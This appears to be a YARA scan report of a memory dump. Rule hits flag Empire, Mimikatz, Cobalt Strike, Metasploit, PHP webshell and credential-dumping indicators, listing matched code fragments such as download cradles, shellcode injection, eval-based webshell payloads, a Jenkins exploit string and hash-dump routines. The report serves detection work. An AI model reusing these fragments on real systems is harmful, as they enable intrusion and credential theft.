| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_Mimikatz | Empire - a pure PowerShell post-exploitation agent - file Invoke-Mimikatz.ps1 | Florian Roth | - 0x11ce4:$s1: $PEBytes64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwc
- 0x11d68:$s2: [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)
- 0x11dd9:$s3: Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Write_HijackDll | Empire - a pure PowerShell post-exploitation agent - file Write-HijackDll.ps1 | Florian Roth | - 0x12193:$s1: $DllBytes = Invoke-PatchDll -DllBytes $DllBytes -FindString "debug.bat" -ReplaceString $BatchPath
- 0x121f9:$s2: $DllBytes32 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBw
- 0x1227d:$s3: [Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Mimipenguin_SH | Detects Mimipenguin Password Extractor - Linux | Florian Roth | - 0xf0be:$s1: $(echo $thishash | cut -d'$' -f 3)
- 0xf0e5:$s2: ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk
- 0xf128:$s3: MimiPenguin Results:
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_generic | php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings | Arnim Rupp | - 0x2c71f:$wfp_tiny2: addslashes
- 0x1b263:$php_short: <?
- 0x1b271:$php_short: <?
- 0x1b29f:$php_short: <?
- 0x1c108:$php_short: <?
- 0x1d62c:$php_short: <?
- 0x1dd6e:$php_short: <?
- 0x1ddc9:$php_short: <?
- 0x1ed4e:$php_short: <?
- 0x1f0a7:$php_short: <?
- 0x20546:$php_short: <?
- 0x20d24:$php_short: <?
- 0x2100b:$php_short: <?
- 0x22817:$php_short: <?
- 0x22c24:$php_short: <?
- 0x23561:$php_short: <?
- 0x240f0:$php_short: <?
- 0x245bd:$php_short: <?
- 0x24814:$php_short: <?
- 0x28ecf:$php_short: <?
- 0x28f4e:$php_short: <?
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_generic_callback | php webshell having some kind of input and using a callback to execute the payload. restricted to small files or would give lots of false positives | Arnim Rupp | - 0x1fabb:$inp1: php://input
- 0x20a8e:$inp1: php://input
- 0x20afd:$inp1: php://input
- 0x20b2c:$inp1: php://input
- 0x203d0:$inp2: _GET[
- 0x203ec:$inp2: _GET[
- 0x2040d:$inp2: _GET[
- 0x23d8d:$inp2: _GET[
- 0x23dcd:$inp2: _GET[
- 0x255da:$inp2: _GET[
- 0x29750:$inp2: _GET[
- 0x2976a:$inp2: _GET[
- 0x2977f:$inp2: _GET[
- 0x2e97f:$inp2: _GET[
- 0x2f603:$inp2: _GET[
- 0x2fcfb:$inp2: _GET[
- 0x2fd0e:$inp2: _GET[
- 0x2fd19:$inp2: _GET[
- 0x2fd81:$inp2: _GET[
- 0x3dc76:$inp2: _GET[
- 0x3dd76:$inp2: _GET[
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_obfuscated_encoding | PHP webshell obfuscated by encoding | Arnim Rupp | - 0x2efcd:$enc_eval1: \x65\x76\x61\x6C\x28
- 0x57a8e:$enc_eval1: \x65\x76\x61\x6C\x28
- 0x57ce7:$enc_eval1: \x65\x76\x61\x6C\x28
- 0x2efcd:$enc_eval2: \x65\x76\x61\x6C\x28
- 0x57a8e:$enc_eval2: \x65\x76\x61\x6C\x28
- 0x57ce7:$enc_eval2: \x65\x76\x61\x6C\x28
- 0x1b263:$php_short: <?
- 0x1b271:$php_short: <?
- 0x1b29f:$php_short: <?
- 0x1c108:$php_short: <?
- 0x1d62c:$php_short: <?
- 0x1dd6e:$php_short: <?
- 0x1ddc9:$php_short: <?
- 0x1ed4e:$php_short: <?
- 0x1f0a7:$php_short: <?
- 0x20546:$php_short: <?
- 0x20d24:$php_short: <?
- 0x2100b:$php_short: <?
- 0x22817:$php_short: <?
- 0x22c24:$php_short: <?
- 0x23561:$php_short: <?
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_gzinflated | PHP webshell which directly eval()s obfuscated string | Arnim Rupp | - 0x1d900:$payload2: eval(gzinflate(base64_decode(
- 0x240f3:$payload2: eval(gzinflate(base64_decode(
- 0x24f45:$payload2: eval(gzinflate(base64_decode(
- 0x312d2:$payload2: eval(gzinflate(base64_decode(
- 0x3268d:$payload2: eval(gzinflate(base64_decode(
- 0x3e9ff:$payload2: eval(gzinflate(base64_decode(
- 0x3eda2:$payload2: eval("?>".gzinflate(base64_decode(
- 0x40bb1:$payload2: eval(gzinflate(base64_decode(
- 0x42319:$payload2: eval(gzinflate(base64_decode(
- 0x21011:$payload4: eval(gzuncompress(base64_decode
- 0x2f227:$payload4: eval(gzuncompress(gzuncompress
- 0x34ff1:$payload7: eval(base64_decode(
- 0x1b263:$php_short: <?
- 0x1b271:$php_short: <?
- 0x1b29f:$php_short: <?
- 0x1c108:$php_short: <?
- 0x1d62c:$php_short: <?
- 0x1dd6e:$php_short: <?
- 0x1ddc9:$php_short: <?
- 0x1ed4e:$php_short: <?
- 0x1f0a7:$php_short: <?
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_dynamic_big | PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k | Arnim Rupp | - 0x1b29f:$new_php2: <?php
- 0x1c108:$new_php2: <?php
- 0x1d62c:$new_php2: <?php
- 0x1dd6e:$new_php2: <?php
- 0x1ddc9:$new_php2: <?php
- 0x1ed4e:$new_php2: <?php
- 0x20546:$new_php2: <?php
- 0x20d24:$new_php2: <?php
- 0x2100b:$new_php2: <?php
- 0x22817:$new_php2: <?php
- 0x23561:$new_php2: <?php
- 0x24814:$new_php2: <?php
- 0x2e974:$new_php2: <?php
- 0x2fab7:$new_php2: <?php
- 0x3040a:$new_php2: <?php
- 0x30522:$new_php2: <?php
- 0x307b3:$new_php2: <?php
- 0x34157:$new_php2: <?php
- 0x3467d:$new_php2: <?php
- 0x40221:$new_php2: <?php
- 0x43046:$new_php2: <?php
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_by_string_known_webshell | Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions. | Arnim Rupp | - 0x3ed93:$pbs5: b374k
- 0x2100b:$front1: <?php eval(
- 0x2fab7:$front1: <?php eval(
- 0x30522:$front1: <?php eval(
- 0x1b263:$php_short: <?
- 0x1b271:$php_short: <?
- 0x1b29f:$php_short: <?
- 0x1c108:$php_short: <?
- 0x1d62c:$php_short: <?
- 0x1dd6e:$php_short: <?
- 0x1ddc9:$php_short: <?
- 0x1ed4e:$php_short: <?
- 0x1f0a7:$php_short: <?
- 0x20546:$php_short: <?
- 0x20d24:$php_short: <?
- 0x2100b:$php_short: <?
- 0x22817:$php_short: <?
- 0x22c24:$php_short: <?
- 0x23561:$php_short: <?
- 0x240f0:$php_short: <?
- 0x245bd:$php_short: <?
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_by_string_obfuscation | PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming | Arnim Rupp | - 0x23623:$opbs18: e'.'v'.'a'.'l
- 0x57772:$opbs25: cr"."eat
- 0x57780:$opbs26: un"."ct
- 0x58af8:$opbs48: se'.(32*2)
- 0x30636:$opbs55: =chr(99).chr(104).chr(114);$_
- 0x30538:$opbs70: riny($_CBFG[
- 0x30528:$opbs73: eval(str_rot13(
- 0x2efcd:$opbs77: \x65\x76\x61\x6C\x28
- 0x57a8e:$opbs77: \x65\x76\x61\x6C\x28
- 0x57ce7:$opbs77: \x65\x76\x61\x6C\x28
- 0x1b263:$php_short: <?
- 0x1b271:$php_short: <?
- 0x1b29f:$php_short: <?
- 0x1c108:$php_short: <?
- 0x1d62c:$php_short: <?
- 0x1dd6e:$php_short: <?
- 0x1ddc9:$php_short: <?
- 0x1ed4e:$php_short: <?
- 0x1f0a7:$php_short: <?
- 0x20546:$php_short: <?
- 0x20d24:$php_short: <?
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_strings_susp | typical webshell strings, suspicious | Arnim Rupp | - 0x3eda2:$sstring1: eval("?>"
- 0x1b263:$php_short: <?
- 0x1b271:$php_short: <?
- 0x1b29f:$php_short: <?
- 0x1c108:$php_short: <?
- 0x1d62c:$php_short: <?
- 0x1dd6e:$php_short: <?
- 0x1ddc9:$php_short: <?
- 0x1ed4e:$php_short: <?
- 0x1f0a7:$php_short: <?
- 0x20546:$php_short: <?
- 0x20d24:$php_short: <?
- 0x2100b:$php_short: <?
- 0x22817:$php_short: <?
- 0x22c24:$php_short: <?
- 0x23561:$php_short: <?
- 0x240f0:$php_short: <?
- 0x245bd:$php_short: <?
- 0x24814:$php_short: <?
- 0x28ecf:$php_short: <?
- 0x28f4e:$php_short: <?
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | CobaltStrike_Sleep_Decoder_Indicator | Detects CobaltStrike sleep_mask decoder | yara@s3c.za.net | - 0x230:$sleep_decoder: 8B 07 8B 57 04 83 C7 08 85 C0 75 2C
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | CobaltStrike_Unmodifed_Beacon | Detects unmodified CobaltStrike beacon DLL | yara@s3c.za.net | - 0x40a:$loader_export: ReflectiveLoader
- 0xaac5:$loader_export: ReflectiveLoader
- 0xab88:$loader_export: ReflectiveLoader
- 0xabb6:$loader_export: ReflectiveLoader
- 0xabdc:$loader_export: ReflectiveLoader
- 0xac06:$loader_export: ReflectiveLoader
- 0xac32:$loader_export: ReflectiveLoader
- 0xadab:$loader_export: ReflectiveLoader
- 0xae14:$loader_export: ReflectiveLoader
- 0xb1fd:$loader_export: ReflectiveLoader
- 0xb279:$loader_export: ReflectiveLoader
- 0xecda:$loader_export: ReflectiveLoader
- 0xed12:$loader_export: ReflectiveLoader
- 0x427:$exportname: beacon.dll
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Metasploit_Loader_RSMudge | Detects a Metasploit Loader by RSMudge - file loader.exe | Florian Roth | - 0xcc0c:$s1: Could not resolve target
- 0xcc29:$s2: Could not connect to target
- 0xcc49:$s3: %s [host] [port]
- 0xcc5e:$s4: ws2_32.dll is out of date.
- 0xcc7d:$s5: read a strange or incomplete length value
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Armitage_msfconsole | Detects Armitage component | Florian Roth | - 0x1b1b:$s1: \umeterpreter\u >
- 0x1b31:$s3: ^meterpreter >
- 0x1b45:$s11: \umsf\u>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Armitage_OSX | Detects Armitage component | Florian Roth | - 0x1e38:$x1: resources/covertvpn-injector.exe
- 0x1e5e:$s10: resources/browserpivot.x64.dll
- 0x1e82:$s17: resources/msfrpcd_new.bat
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_Mimikatz | Detects Invoke-Mimikatz String | Florian Roth | - 0x965a:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
- 0x96d1:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | NTLM_Dump_Output | NTML Hash Dump output file - John/LC format | Florian Roth | - 0x1acae:$s0: 500:AAD3B435B51404EEAAD3B435B51404EE:
- 0x1acd8:$s1: 500:aad3b435b51404eeaad3b435b51404ee:
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_SMBExec | Detects Invoke-WmiExec or Invoke-SmbExec | Florian Roth | - 0x9a2e:$x1: Invoke-SMBExec -Target
- 0x9a49:$x2: $packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
- 0x9ab6:$s1: Write-Output "Command executed with service $SMB_service on $Target"
- 0x9aff:$s2: $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
- 0x9b62:$s3: $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_WMIExec_Gen_1 | Detects Invoke-WmiExec or Invoke-SmbExec | Florian Roth | - 0x9d34:$x1: Invoke-WMIExec
- 0x9d48:$x2: $target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split))
- 0x9db8:$s1: Import-Module $PWD\Invoke-TheHash.ps1
- 0x9de2:$s2: Import-Module $PWD\Invoke-SMBClient.ps1
- 0x9e0e:$s3: $target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList
- 0x9e62:$x4: Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_SMBExec_Invoke_WMIExec_1 | Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1 | Florian Roth | - 0xa065:$s1: $process_ID = $process_ID -replace "-00-00",""
- 0xa098:$s2: Write-Output "$Target did not respond"
- 0xa0c3:$s3: [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_WMIExec_Gen | Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1 | Florian Roth | - 0xa321:$s1: $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)
- 0xa366:$s2: $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- 0xa3d1:$s3: $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PowerShdll | Detects hack tool PowerShdll | Florian Roth | - 0x10f34:$x2: \PowerShdll.dll
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WMImplant | Auto-generated rule - file WMImplant.ps1 | Florian Roth | - 0x1a8c0:$x1: Invoke-ProcessPunisher -Creds $RemoteCredential
- 0x1a8f4:$x2: $Target -query "SELECT * FROM Win32_NTLogEvent WHERE (logfile='security')
- 0x1a942:$x3: WMImplant -Creds
- 0x1a957:$x4: -Download -RemoteFile C:\passwords.txt
- 0x1a982:$x5: -Command 'powershell.exe -command "Enable-PSRemoting
- 0x1a9bb:$x6: Invoke-WMImplant
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_PSImage | Detects a command to execute PowerShell from String | Florian Roth | - 0x9800:$: IEX([System.Text.Encoding]::ASCII.GetString(
- 0x982f:$: System.Drawing.Bitmap((a Net.WebClient).OpenRead(
- 0x9863:$: 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9 ...
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | merlinAgent | Detects Merlin agent | Hilko Bengen | - 0xc8e9:$x1: Command output:\x0D\x0A\x0D\x0A%s
- 0xc903:$x2: [-]Connecting to web server at %s to update agent configuration information.
- 0xc954:$x3: [-]%d out of %d total failed checkins
- 0xc97e:$x4: [!}Unknown AgentControl message type received %s
- 0xc9b3:$x5: [-]Received Agent Kill Message
- 0xc9d6:$x6: [-]Received Server OK, doing nothing
- 0xc9ff:$x7: [!]There was an error with the HTTP client while performing a POST:
- 0xca47:$x8: [-]Sleeping for %s at %s
- 0xca64:$s1: Executing command %s %s %s
- 0xca83:$s2: [+]Host Information:
- 0xca9c:$s3: \x09Hostname: %s
- 0xcaae:$s4: \x09Platform: %s
- 0xcac0:$s5: \x09User GUID: %s
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_OSiRis | Osiris Device Guard Bypass - file Invoke-OSiRis.ps1 | Florian Roth | - 0x173a1:$x1: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target
- 0x172cc:$x2: Invoke-OSiRis
- 0x17414:$x2: Invoke-OSiRis
- 0x17426:$x3: -Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username}
- 0x1746c:$x4: Device Guard Bypass Command Execution
- 0x17496:$x5: -Put Payload in Win32_OSRecoveryConfiguration DebugFilePath
- 0x173a1:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
- 0x174d6:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SUSP_Double_Base64_Encoded_Executable | Detects an executable that has been encoded with base64 twice | Florian Roth | - 0x182a3:$: VFZwVEFRR
- 0x182af:$: RWcFRBUU
- 0x182ba:$: UVnBUQVFF
- 0x182c6:$: VFZvQUFBQ
- 0x182d2:$: RWb0FBQU
- 0x182dd:$: UVm9BQUFB
- 0x182e9:$: VFZxQUFBR
- 0x182f5:$: RWcUFBQU
- 0x18300:$: UVnFBQUFF
- 0x1830c:$: VFZwUUFBS
- 0x18318:$: RWcFFBQU
- 0x18323:$: UVnBRQUFJ
- 0x1832f:$: VFZxUUFBT
- 0x1833b:$: RWcVFBQU
- 0x18346:$: UVnFRQUFN
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SUSP_Reversed_Base64_Encoded_EXE | Detects an base64 encoded executable with reversed characters | Florian Roth | - 0x18456:$s1: AEAAAAEQATpVT
- 0x18468:$s2: AAAAAAAAAAoVT
- 0x1847a:$s3: AEAAAAEAAAqVT
- 0x1848c:$s4: AEAAAAIAAQpVT
- 0x1849e:$s5: AEAAAAMAAQqVT
- 0x184b1:$sh1: SZk9WbgM1TEBibpBib1JHIlJGI09mbuF2Yg0WYyd2byBHIzlGaU
- 0x184ea:$sh2: LlR2btByUPREIulGIuVncgUmYgQ3bu5WYjBSbhJ3ZvJHcgMXaoR
- 0x18523:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SUSP_Script_Base64_Blocks_Jun20_1 | Detects suspicious file with base64 encoded payload in blocks | Florian Roth | - 0x18634:$sa1: <script language=
- 0x4966d:$sa1: <script language=
- 0x53353:$sa1: <script language=
- 0x1864b:$sb2: 41 41 41 22 2B 0D 0A 22 41 41 41
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SUSP_Reversed_Hacktool_Author | Detects a suspicious path traversal into a Windows folder | Florian Roth | - 0x1875b:$x1: iwiklitneg
- 0x1876a:$x2: eetbus@
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SUSP_Base64_Encoded_Hacktool_Dev | Detects a suspicious base64 encoded keyword | Florian Roth | - 0x1883b:$: QGdlbnRpbGtpd2
- 0x1884c:$: BnZW50aWxraXdp
- 0x1885d:$: AZ2VudGlsa2l3a
- 0x1886e:$: QGhhcm1qMH
- 0x1887b:$: BoYXJtajB5
- 0x18888:$: AaGFybWowe
- 0x18895:$: IEBzdWJ0ZW
- 0x188a2:$: BAc3VidGVl
- 0x188af:$: gQHN1YnRlZ
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_MetasploitPayload | Detects Empire component - file Invoke-MetasploitPayload.ps1 | Florian Roth | - 0x2771:$s1: $ProcessInfo.Arguments="-nop -c $DownloadCradle"
- 0x27a6:$s2: $PowershellExe=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Exploit_Jenkins | Detects Empire component - file Exploit-Jenkins.ps1 | Florian Roth | - 0x2924:$s1: $postdata="script=println+new+ProcessBuilder%28%27"+$($Cmd)+"
- 0x2966:$s2: $url = "http://"+$($Rhost)+":"+$($Port)+"/script"
- 0x299c:$s3: $Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Get_SecurityPackages | Detects Empire component - file Get-SecurityPackages.ps1 | Florian Roth | - 0x2b08:$s1: $null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)
- 0x2b40:$s2: $EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_PowerDump | Detects Empire component - file Invoke-PowerDump.ps1 | Florian Roth | - 0x2cc4:$x16: $enc = Get-PostHashdumpScript
- 0x2ce7:$x19: $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
- 0x2d32:$x20: $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Install_SSP | Detects Empire component - file Install-SSP.ps1 | Florian Roth | - 0x2eb8:$s1: Install-SSP -Path .\mimilib.dll
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_ShellcodeMSIL | Detects Empire component - file Invoke-ShellcodeMSIL.ps1 | Florian Roth | - 0x3013:$s1: $FinalShellcode.Length
- 0x302e:$s2: @(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)
- 0x305e:$s3: @(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,
- 0x308d:$s4: $TargetMethod.Invoke($null, @(0x11112222)) | Out-Null
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HKTL_Empire_PowerUp | Detects Empire component - file PowerUp.ps1 | Florian Roth | - 0x31e9:$x2: $PoolPasswordCmd = 'c:\windows\system32\inetsrv\appcmd.exe list apppool
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_Mimikatz_Gen | Detects Empire component - file Invoke-Mimikatz.ps1 | Florian Roth | - 0x3366:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x11cef:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x12205:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x338f:$s2: Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, "Void", 0, "", $ExeArgs)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Get_GPPPassword | Detects Empire component - file Get-GPPPassword.ps1 | Florian Roth | - 0x3530:$s1: $Base64Decoded = [Convert]::FromBase64String($Cpassword)
- 0x356d:$s2: $XMlFiles += Get-ChildItem -Path "\\$DomainController\SYSVOL" -Recurse
- 0x35b8:$s3: function Get-DecryptedCpassword {
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_SmbScanner | Detects Empire component - file Invoke-SmbScanner.ps1 | Florian Roth | - 0x370f:$s1: $up = Test-Connection -count 1 -Quiet -ComputerName $Computer
- 0x3752:$s2: $out | add-member Noteproperty 'Password' $Password
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Exploit_JBoss | Detects Empire component - file Exploit-JBoss.ps1 | Florian Roth | - 0x37c7:$s1: Exploit-JBoss
- 0x38b3:$s1: Exploit-JBoss
- 0x38c5:$s2: $URL = "http$($SSL)://" + $($Rhost) + ':' + $($Port)
- 0x38fe:$s3: "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service
- 0x3946:$s4: http://blog.rvrsh3ll.net
- 0x3963:$s5: Remote URL to your own WARFile to deploy.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_dumpCredStore | Detects Empire component - file dumpCredStore.ps1 | Florian Roth | - 0x3aba:$x1: [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredReadW"
- 0x3b08:$s12: [String] $Msg = "Failed to enumerate credentials store for user '$Env:UserName'"
- 0x3b5e:$s15: Rtn = CredRead("Target", CRED_TYPE.GENERIC, out Cred);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_EgressCheck | Detects Empire component - file Invoke-EgressCheck.ps1 | Florian Roth | - 0x3ccc:$s1: egress -ip $ip -port $c -delay $delay -protocol $protocol
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Out_Minidump | Detects Empire component - file Out-Minidump.ps1 | Florian Roth | - 0x3fbc:$s1: $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
- 0x3ffd:$s2: $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_PsExec | Detects Empire component - file Invoke-PsExec.ps1 | Florian Roth | - 0x4161:$s1: Invoke-PsExecCmd
- 0x4176:$s2: "[*] Executing service .EXE
- 0x4196:$s3: $cmd = "%COMSPEC% /C echo $Command ^> %systemroot%\Temp\
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_PostExfil | Detects Empire component - file Invoke-PostExfil.ps1 | Florian Roth | - 0x4302:$s1: # upload to a specified exfil URI
- 0x4328:$s2: Server path to exfil to.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_SMBAutoBrute | Detects Empire component - file Invoke-SMBAutoBrute.ps1 | Florian Roth | - 0x447a:$s1: [*] PDC: LAB-2008-DC1.lab.com
- 0x449c:$s2: $attempts = Get-UserBadPwdCount $userid $dcs
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Get_Keystrokes | Detects Empire component - file Get-Keystrokes.ps1 | Florian Roth | - 0x45f8:$s1: $RightMouse = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_DllInjection | Detects Empire component - file Invoke-DllInjection.ps1 | Florian Roth | - 0x4797:$s1: -Dll evil.dll
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_KeePassConfig | Detects Empire component - file KeePassConfig.ps1 | Florian Roth | - 0x48d2:$s1: $UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_SSHCommand | Detects Empire component - file Invoke-SSHCommand.ps1 | Florian Roth | - 0x4a7f:$s1: $Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA
- 0x4aba:$s2: Invoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command "id"
- 0x4b0e:$s3: Write-Verbose "[*] Error loading dll"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_PowerShell_Framework_Gen1 | Detects Empire component | Florian Roth | - 0x4d7b:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x96d1:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x11dd9:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x4da5:$s2: $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_PowerUp_Gen | Detects Empire component - from files PowerUp.ps1, PowerUp.ps1 | Florian Roth | - 0x4f49:$s1: $Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath
- 0x4f93:$s2: $Result = sc.exe pause $($TargetService.Name)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_PowerShell_Framework_Gen2 | Detects Empire component | Florian Roth | - 0x5208:$x1: $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
- 0x527f:$s20: #Shellcode: CallDllMain.asm
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Agent_Gen | Detects Empire component - from files agent.ps1, agent.ps1 | Florian Roth | - 0x541f:$s1: $wc.Headers.Add("User-Agent",$script:UserAgent)
- 0x5453:$s2: $min = [int]((1-$script:AgentJitter)*$script:AgentDelay)
